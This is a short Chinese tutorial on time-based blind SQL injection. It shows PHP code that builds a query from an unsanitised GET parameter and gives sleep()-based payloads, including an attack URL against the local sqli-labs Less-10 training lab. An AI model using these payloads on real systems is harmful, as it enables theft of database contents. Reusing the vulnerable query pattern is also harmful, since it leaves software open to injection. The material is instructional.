时间盲注原理:
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row=mysql_fetch_array($result);
if($row)
{
echo "";
}
else
{
echo "";
}
- 代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息
- 语句执行后也不提示真假,我们不能通过页面的内容来判断
- 这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间盲注
时间盲注方法:
构造逻辑语句,通过条件语句进行判断,为真就立即执行,否则延时执行
核心语法:
if(left(user(),1)='a',0,sleep(3));
真实场景:
if(ascii(substr(database(),1,1)>115,0,sleep(5))%23
sqli-labs10:
http://127.0.0.1/Less-10/?id=1" and if(left(user(),1)='a',0,sleep(3))--+
网友评论